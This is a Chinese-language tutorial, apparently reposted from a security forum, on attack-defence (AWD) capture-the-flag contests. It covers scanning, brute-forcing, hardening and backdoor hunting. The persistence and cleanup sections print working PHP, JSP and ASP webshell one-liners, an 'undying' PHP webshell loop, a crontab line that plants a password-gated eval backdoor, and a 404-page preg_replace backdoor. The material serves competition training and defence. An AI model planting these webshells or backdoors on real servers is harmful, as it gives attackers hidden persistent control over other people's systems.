竞赛介绍

前言

最近参加了一些AWD比赛,之前没怎么接触过,顺带做个总结,希望能帮助到大家。

竞赛题型

主要题型为WEB和PWN,涉及语言多数为PHP,还有少量Java、Python。
WEB主要是一些CMS和框架安全漏洞,如注入、上传和反序列化等,更多是依赖已知漏洞。

竞赛拓扑

竞赛流程

一般比赛会将加固环节和攻击环节分开,先统一加固后再进行攻击。

攻击技术解析

信息确认

开赛前会给到参赛选手相关信息,如下图所示:

说明

标记1:比赛名称

标记2:白名单一般用于防止外部恶意攻击,如果赛方发现名单以外IP 可能会进行封禁处理。

标记3:用户服务器登录,账号为team1 密码为fe85d7dec6e3757f391e013efdd67c0c,端口为2222,一般服务器为Linux系统,登录工具可以使用xSHELL,finalSHELL等。

标记4:Token主要用于脚本身份凭证用于自动化提交鉴别。虚拟IP为靶机访问网址。其他选手地址为192-168-x-250.pvp923.bugku.cn,x可以是1-255内任一个数字。

标记5:主要用于扫描其他选手靶机用来攻击获取到根目录FLAG并提交得分,靶机环境和自己的靶机一致。

标记6:FLAG提交处。

标记7:用于脚本提交的api接口。

标记8:大屏观赛区

也有可能是这种,做个参考吧。

登录靶机

以FinalSHELL为例,使用账户密码登录。
操作如下图所示:

说明

标记1:主机地址,网址或ip地址都有可能。

标记2:端口信息,根据赛方信息提供

标记3:输入赛方提供的用户名和密码进行登录,用户权限一般较低。有时候会用RSA公钥登录的方式进行登录。

信息搜集

主机探测

一般使用nmap或httpscan

查看自己主机IP:

ifconfig   #Linux
ipconfig   #Windows

扫描C段存活:

namp -sn 192.168.0.0/24          #扫描C段主机存活
httpscan.py 192.168.0.0/24 –t 10  #扫描C段主机存活

端口探测

一般先搜集自己的主机端口信息,比赛主机开放端口情况大多情况一致,然后类比指定扫描其他主机端口信息,最后挂后台全端口扫描防止端口遗漏!

nmap -sV 192.168.0.2            #扫描主机系统版本
nmap -sS 192.168.0.2            #扫描主机常用端口
nmap -sS -p 80,445 192.168.0.2  #扫描主机部分端口
nmap -sS -p- 192.168.0.2        #扫描主机全部端口

nmap官方文档:
https://nmap.org/man/zh/man-host-discovery.html

httpscan 主机探测:
https://github.com/zer0h/httpscan

应用发现

apaech2.conf是主配置文件,不是真正的具体配置文件,它只是把各 个零散的配置文件以inluceding方式包含进来,如下图所示:

组件发现:

find / -name "nginx.conf"                 #定位nginx目录
find / -path "*nginx*" -name nginx*conf   #定位nginx配置目录
find / -name "httpd.conf"                 #定位apache目录
find / -path "*apache*" -name apache*conf #定位apache配置目录

网站发现:

find / -name "index.php"   #定位网站目录

日志发现:

/var/log/nginx/    #默认Nginx日志目录
/var/log/apache/   #默认Apache日志目录
/var/log/apache2/  #默认Apache日志目录
/usr/local/tomcat/logs #Tomcat日志目录
tail -f xxx.log   #实时刷新滚动日志文件

以上是定位常见文件目录的命令或方法,比赛需要根据实际情况类推,善用find命令!

备份扫描

自动化利用扫描工具参考:
https://github.com/sry309/ihoneyBakFileScan 多进程批量网站备份文件泄露扫描工具
https://github.com/maurosoria/dirsearch WEB网站目录扫描

攻击主机端口

端口利用主要方式是未授权访问和弱口令漏洞。

未授权访问漏洞利用总结参考:
https://paper.seebug.org/409/

常见端口利用总结参考:
https://www.cnblogs.com/ldragon2000/p/14161054.html

部分利用工具参考:
https://github.com/vanhauser-thc/thc-hydra Hydra九头蛇
https://github.com/shack2/SNETCracker 超级弱口令工具
https://github.com/se55i0n/DBScanner 数据库爆破工具
https://github.com/cwkiller/unauthorized-check 未授权检测工具

字典参考:
https://github.com/cpkkcb/fuzzDicts
https://github.com/TheKingOfDuck/fuzzDicts

攻击WEB服务

一般通过访问获取的端口就能访问到预设的WEB靶场,如下图所示:

WEB 方面的语言多为PHP,小部分为Java 和Python。这里的WEB环境分两种情况。

一种是已有漏洞的框架,一种是出题人写的框架。如果是已有漏洞的框架,通常会比较明显。比如说Struts2各种漏洞等等,用工具扫就可以扫出来。这个需要准备得比较充分,在电脑中备好 EXP 库、漏洞库和各种扫描工具库,以便能够快速利用比较明显的漏洞。

另一种情况就是分析WEB日志,学习其他选手攻击思路和漏洞利用过程,也是一个不错的得分途径。

别忘了WEB后台弱口令!!

漏洞资料库集合参考:

https://github.com/cckuailong/vulbase

部分已知漏洞检测工具参考:

https://github.com/chaitin/xray 支持被动主动扫描
https://gobies.org/ 主机探测、端口爆破和漏洞检测
https://github.com/knownsec/pocsuite3 批量利用框架

权限提升

现在比赛很少直接给予root权限,不多谈。但是加固环节权限过低无法进行,如果比赛允许可以尝试提权。

提权参考:
https://cloud.tencent.com/developer/article/1942516 一般提权
https://github.com/SecWiki/linux-kernel-exploits 提权脚本

权限维持

拿到WEBSHELL后,需要维持权限!简单的WEBSHELL 一眼就会被识别,在AWD 中优先考虑种不死马、反弹 SHELL等留后门方式维持权限,以便后续刷 FLAG,再考虑提升权限。

隐藏的文件读取

header(php'flag:'.file_get_contents('/tmp/flag'));

条件允许的话,将flag信息直接读取并返回到header头中,这样做不易被发现。

PHP不死马示例:

';
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .2.php');
usleep(5000);
} 
?>

定时任务写马示例:

system('echo "* * * * * echo "<?php if(md5(\\\\$_POST[pass])=='7b7fdffef464019f7190d0384d5b3838'){@eval(\\\\$_POST[1]);}  " > /var/www/html/.index.phpn* * * * * chmod 777 /var/www/html/.index.php" | crontab;whoami');

快速得分

一般编写Python脚本或利用CURL工具进行批量获取FLAG得分,需要语言基础。

得分会在大屏幕实时动态展示:

批量利用框架工具:
https://github.com/Ares-X/AWD-Predator-Framework

防御技术解析

网站备份

目的是防止修改源码出错,或被对手恶意删除源码,或快速恢复网站防止被裁判组check探测服务存活失败丢分。

压缩文件:

tar -cvf web.tar /var/www/html
zip -q -r web.zip /var/www/html

解压文件:

tar -xvf web.tar -c /var/www/html
unzip web.zip -d /var/www/html

备份到服务器:

mv web.tar /tmp
mv web.zip /home/xxx

上传下载文件:

scp username@servername:/path/filename /tmp/local_destination #从服务器下载单个文件到本地
scp /path/local_filename username@servername:/path  #从本地上传单个文件到服务器
scp -r username@servername:remote_dir/ /tmp/local_dir #从服务器下载整个目录到本地
scp -r /tmp/local_dir username@servername:remote_dir #从本地上传整个目录到服务器

SSH相关工具:

Xshell、SecureCRT、finalshell

FTP相关工具:

FileZilla 、WinSCP、SmartFTP

数据备份

数据库配置信息一般可以通过如config.php/web.conf等文件获取。
以MySQL数据库备份数据为例:

备份指定数据库:

mysqldump –u username –p password databasename > bak.sql

备份所有数据库:

mysqldump –all -databases > bak.sql

导入数据库:

mysql –u username –p password database

信息搜集

 

netstat -ano/-a #查看端口情况
uname -a  #系统信息
ps -aux、ps -ef #进程信息
cat /etc/passwd #用户情况
ls /home/ #用户情况
id   #用于显示用户ID,以及所属群组ID
find / -type d -perm -002 #可写目录检查
grep -r “flag” /var/www/html/  #查找默认FLAG

口令更改

信息搜集后,将未授权和弱口令问题及时修复,包括但不限于服务器SSH口令、数据库口令和WEB服务口令。

千万别忘记WEB应用的后台密码修改!!

passwd username    #ssh口令修改
set password for mycms@localhost = password('123'); #MySQL密码修改
find /var/www//html -path '*config*’  #查找配置文件中的密码凭证

备份检查

find  /var/www/html/ -name "*.tar"
find  /var/www/html/ -name "*.zip"

后门查杀

通过命令查看可疑文件:

find /var/www/html -name *.php -mmin -20 #查看最近20分钟修改文件
find ./ -name '*.php' | xargs wc -l | sort -u #寻找行数最短文件
grep -r --include=*.php  '[^a-z]eval($_POST'  /var/www/html    #查包含关键字的php文件
find /var/www/html -type f -name "*.php" | xargs grep "eval(" |more

一般查杀:河马WEBSHELL和D盾查杀。

# phpwebshell
<?php @eval($_GET['cmd']); ?>

<?php @eval($_POST['cmd']); ?>

<?php @eval($_REQUESTS['cmd']); ?>
# jspwebshell

Runtime.getRuntime().exec(request.getParameter("cmd"));%>
# aspwebshell

eval request ("cmd")%> execute(request("cmd")) %>

不死马查杀:杀进程后重启服务、写一个同名的文件夹和写一个sleep时间低于别人的马(或者写一个脚本不断删除别人的马)

比如写个马来一直杀死不死马进程:

<?php 

system("kill -9 pid;rm -rf .shell.php"); #pid和不死马名称根据实际情况定

?>

后门用户查杀:UID大于500的都是非系统账号,500以下的都为系统保留的账号,使用userdel -r username 完全删除账户

其他查杀:部分后门过于隐蔽,可以使用ls -al命令查看所有文件及文件修改时间和内容进行综合判断,进行删除。可以写脚本定时清理上传目录、定时任务和临时目录等

经典preg_replace伪装的404后门示例:

使用菜刀连接 密码:error



html>head>

title>404 Not Foundtitle>

head>body>

h1>Not Foundh1>

p>The requested URL was not found on this server.p>

body>html>

<?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found');

?>

关闭进程

ps -aux  #查看进程
kill -9 pid #强制进程查杀

关闭端口

netstat -anp  #查看端口
firewall-cmd --zone= public --remove-port=80/tcp –permanent #关闭端口
firewall-cmd –reload #重载防火墙

漏洞修复

漏洞修复遵循保证服务不长时间宕机的情况下进行修复, 多使用安全过滤函数,能修复尽量修复,不能修复先注释或删除相关代码,但需保证页面显示正常。

可以下载文件到本地进行修改后上传到服务器进行覆盖操作,也可以直接通过vim编辑器进行代码修复操作!

修复参考:
https://www.cnblogs.com/iAmSoScArEd/p/10651947.html 常规漏洞修复建议
https://www.cnblogs.com/chenpingzhao/p/4802179.html PHP安全函数

文件监控

文件监控能及时木马文件后门生成,及时删除防止丢分。
文件监控脚本:
https://github.com/TheKingOfDuck/FileMonitor

部署WAF

比赛规则决定能否部署WAF和监控工具。WAF具有两面性,抵挡大部分攻击的同时,可能因为某些函数无法使用导致服务宕机。WAF可以自己写,也可以使用如安全狗等第三方WAF。

常见PHP网站系统WAF添加路径:

DiscuzX2 configconfig_global.php

Wordpress wp-config.php

Metinfo includehead.php

PHPCMS V9 phpcmsbase.php

PHPWIND8.7 datasql_config.php

DEDECMS5.7 datacommon.inc.php

WAF脚本参考:
https://github.com/sharpleung/CTF-WAF

原文地址:https://xz.aliyun.com/t/10995

发表回复

后才能评论

评论(1)